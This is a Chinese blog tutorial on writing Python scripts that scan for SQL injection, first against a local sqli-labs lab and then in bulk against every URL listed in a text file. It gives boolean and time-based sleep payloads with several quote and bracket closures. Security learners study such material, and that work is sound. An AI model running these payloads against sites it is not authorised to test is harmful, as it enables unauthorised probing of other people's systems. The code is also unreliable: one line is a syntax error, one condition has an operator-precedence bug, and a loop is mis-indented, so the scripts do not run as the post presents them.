python之poc编写——sql篇

最新推荐文章于 2024-08-03 23:12:25 发布
最新推荐文章于 2024-08-03 23:12:25 发布
阅读量6.5k 收藏 25
点赞数 5
分类专栏: ctf web 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51796436/article/details/123190514
版权

文章目录


poc:即验证漏洞是否存在的脚本,也就是扫描器
兄弟们,开始写扫描器啦

sql注入漏洞漏扫

单个网站基础sql扫描

第一步,当然是写request函数啦。除了时间盲注外,1' and 1=2%23就能判断字符型的sql注入

#!/usr/bin/python
# encoding = utf-8

import requests
def poc(url):
	result_rep = requests.get(url)
	return len(result_rep.text)

if __name__=="__main__":
	header = {"User_Agent":"Firefox/50.0"}#http头,随便写一个装装样子
	url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1"
	
	result_lens = []#创建空列表用于比对后面and判断的返回包长度
	rep = requests.get(url,headers=header)
	normal_len = len(rep.text)#正常请求,也就是if判断正确时应该返回的数据包长度
	payloads = ["\'%20and%201=1%23","\'%20and%201=2%23"]#通过单引号and 1=2来验证,用Url编码了空格
	for payload in payloads:
		result_len = poc(url+payload)#发包
		result_lens.append(result_len)
		
	if(result_lens[0] == normal_len & normal_len != result_lens[1]):#表示and 1=1是正确返回包的长度,而and 1=2是错误的返回包长度,也就是说单引号后的内容被mysql正确的执行
		print "exists SQL Injection!"

ok,一个很辣鸡的poc产生了,我相信知道sql注入原理的伙伴看到这些个注释没可能读不懂这个脚本

那批量扫描呢?

多个网站sql基础扫描

当然是读文件啦
对上述代码进行改良:

#!/usr/bin/python
# encoding = utf-8

import requests
def poc(url):
	result_rep = requests.get(url)
	return len(result_rep.text)

def run(url):#把main里进行sql检验的代码进行重复调用,把这段代码写进run函数
	result_lens = []
	rep = requests.get(url,headers=header)
	normal_len = len(rep.text)
	payloads = ["\'%20and%201=1%23","\'%20and%201=2%23"]
	for payload in payloads:
		result_len = poc(url+payload)
		result_lens.append(result_len)
		
	if(result_lens[0] == normal_len & normal_len != result_lens[1]):
		print "exists SQL Injection!"

if __name__=="__main__":
	header = {"User_Agent":"Firefox/50.0"}
	urls = open("url.txt",'r').readlines()#将每一行的信息保存到列表里
for url in urls:
	run(url)#对url.txt内的网址批量用数据包长度比对方式进行扫描

现在将待扫网址写入url.txt中即可批量扫描,但是如果是时间盲注,那用数据返回包的长度就不能判断有无sql注入漏洞了

时间盲注型扫描

这种扫描就适用于没有过滤且为字符型的所有注入,要用到上一博客讲到的Exception进行异常判断,加在poc校验内。那都用sleep来判断了,result_len就没用了,直接删掉

#!/usr/bin/python
# encoding = utf-8

import requests
def poc(url):
	try:
		result_rep = requests.get(url,timeout=3)
		result "no sql injection"
	except Exception as e:
		return "timeout"#如果sleep了,就存在sql注入漏洞

def run(url):
	rep = requests.get(url,headers=header)
	payloads = ["\'%20and%20sleep(5)%23"]
	for payload in payloads:
		result_info = poc(url+payload)
		if("timeout" in result_info):
			print "exist sql injection!"

if __name__=="__main__":
	header = {"User_Agent":"Firefox/50.0"}
	urls = open("url.txt",'r').readlines()#将每一行的信息保存到列表里
for url in urls:
	run(url)#对url.txt内的网址批量用数据包长度比对方式进行扫描

py脚本扫描结果

升阶版sql批量扫描

上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等
在payload中多加几个类型

payloads = ["\'%20and%20sleep(5)%23","\"%20and%20sleep(5)%23","%20and%20sleep(5)%23","\')%20and%20sleep(5)%23","\'))%20and%20sleep(5)%23"]

正确的批量扫描http头注入和waf注入poc下一节来讲

马戏团小丑
关注
  • 5
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5537
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXP,Exploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
python编写poc_Poc编写
weixin_39619635的博客
01-14 1142
0x01 PoCPoC(全称: Proof of Concept), 又叫概念验证。作为我们的漏洞验证程序,他可能是一段不完整的程序,仅仅是为了证明我们提出漏洞的观点。推荐使用Python编写PoC,因为安全界用 Python 的人居多,写的东西能被更多人看懂,并且 Python 这门语言的灵活,类库强大等特性,给编写的人提供了很大便利。Exp(全称: Exploit),又叫漏洞利用程序。比如目标...
Python从0到POC编写--模块
余十步的博客
05-10 961
allow_redirects: 开关, 表示是否允许对url进行重定向, 默认为True。params: 翻译过来就是参数, url中的额外参数,字典或者字节流格式,可选。,它也可以接受一个字符串对象。可以用这个字段来定义http的访问头,可以模拟任何浏览器来对url发起访问。它通常跟一些第三方解析器一起使用,如 lxml,XML,html5lib 等。这里如果使用 urllib 模块来打开 url ,如果存在中文会报错,与params不同的是,data提交的数据并不放在url链接里,
python编写poc_POC编写基础知识
weixin_29405101的博客
12-23 3348
什么是 PoCPoC(全称: Proof of Concept), 中文译作概念验证。在安全界,你可以理解成为漏洞验证程序,和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码什么是 ExpExp(全称: Exploit),中文叫漏洞利用程序。名字上说的已经很清楚了,简单讲,就是一段可以发挥漏洞价值的程序,这话感觉和没说一样。想象一下这样的场景,目标存在一个 SQL...
POC编写基础————2、POC编写技能需求
Fly_鹏程万里
02-27 2915
前言 本小节主要为大家简单的介绍一些在编写POC时需要的基本技能。 网络通信原理 因为我们的POC是针对网络当中的一些应用程序当中是否存在漏洞进行验证的,那么我们就有必要深入了解基本的网络通信原理,例如:数据的请求与应答过程。同时我们也有必要了解一些基本的网络术语,例如:IP地址、域名(二级域名、三级域名等)、端口、TCP原理、HTTP协议、socket编程通信等等的内容,这一点不仅在您复现...
Python脚本】SQL盲注漏洞——基于布尔型SQL盲注检测
weixin_55205599的博客
10-18 103
1)写入脚本信息,导入模板,定义存储数据库数据的变量且定义一个request对象用来进行请求。
Python灰帽编程——定制EXP武器库
来日可期的博客
09-22 1182
POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的)EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的)Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:利用漏洞时所执行的代码。Payload的一种,由于其建立正向/反向shell而得名。
python和信息安全_python攻防之基础
weixin_39626131的博客
12-05 931
众所周知,python是近几年比较火的语言之一,它具有简单易懂、免费开源、可移植、可扩展、丰富的第三方库函数等特点,Java需要大量代码的功能同样用python仅短短几行代码就能实现,python具备跨平台特性,Linux和Windows都能使用,所以想不被用于网络安全都难。那么,这门语言究竟都能在网络攻防中实现哪些作用呢?目录扫描:Web+多线程(requests+threading+Queue...
Python爬虫之基础
Mi1k7ea
04-04 7321
关于Python的基本语法就不多说了,这里直接从各个小的程序开始,本文会不断地进行更新,一步步来走进Python~同时也希望各位可以给点好的建议哈~一、在Kali Linux中安装sublime text 3:先下载sublime text 3,然后到下载的目录中执行以下命令即可:dpkg -i ./sublime-text_build-3126_amd64.deb二、Socket模块:在导入so...
生命在于学习——初识pocsuite3框架
易水哲的博客
10-16 1628
文章记录的是pocsuite3框架
Python从入门到编写POC之读写文件1
08-03
Python编程中,读写文件是一项基础而重要的操作。本文主要介绍了如何使用Python进行文件的读写,并通过实例讲解了相关知识点。 首先,文件的读写通常涉及到`open()`函数,它用于打开一个文件并返回一个文件对象。...
PocList:python或go编写poc
04-04
标题 "PocList:python或go编写poc" 暗示了这是一个与网络安全相关的项目,其中包含用Python或Go编程语言编写的Proof of Concept(PoC)代码。Proof of Concept,通常简称PoC,是指一段能证明某个概念、漏洞或攻击...
#资源分享达人# POC编写指南.zip
08-03
"python" 提示了这个指南可能会使用Python语言来编写PoCPython因其简洁易读的语法和丰富的库而常被安全研究人员用于编写快速原型。"信息安全" 是此话题的背景,表明PoC编写与网络安全密切相关,旨在发现和修复...
Python从入门到编写POC之特殊函数1
08-03
"Python从入门到编写POC之特殊函数1" Python 是一个广泛使用的高级编程语言,它提供了大量的内建函数和模块,帮助开发者快速地开发各种应用程序。在本文中,我们将探索 Python 中的一些特殊函数,包括 lambda 函数...
poc编写真实案例文档
07-21
poc编写真实案例文档
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 182
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
内网安全:多种横向移动方式
最新发布
8888的博客
08-03 539
DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
云原生安全检测工具(容器安全、trivy、veinmind-tools)
墨痕诉清风的博客
07-31 578
例如上文的 mysql:5.7 镜像,在扫描镜像包含的 openssl 库时,会根据操作系统版本,去 trivy.db 的"Oracle Linux 7"、“openssl”桶中查询相关漏洞信息,并最终生成 CVE-2021-23840 漏洞告警。如果没有,则需要解析基础镜像,并根据其中的操作系统版本文件(etc/alpine-release、usr/lib/os-release、/etc/os-release 等),来确定基础镜像的操作系统版本。‍‍Trivy 的漏洞库,名叫 trivy-db​​。
python编写poc脚本
10-11
编写 Python POC(Proof of Concept)脚本时,您需要先确定攻击目标和漏洞类型。然后,您可以使用适当的库和模块来构建脚本。以下是一个示例脚本,用于检测目标是否存在一个简单的HTTP服务,并输出其响应状态码: ```python import requests target_url = "http://example.com" # 替换为目标URL try: response = requests.get(target_url) if response.status_code == 200: print("目标存在漏洞") else: print("目标不具备漏洞") except requests.exceptions.RequestException: print("无法连接到目标") ``` 请注意,这只是一个简单的示例,具体的脚本编写取决于您的需求和攻击目标。您可能需要在脚本中添加更复杂的逻辑和功能,以便进行更详细的漏洞检测和利用。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值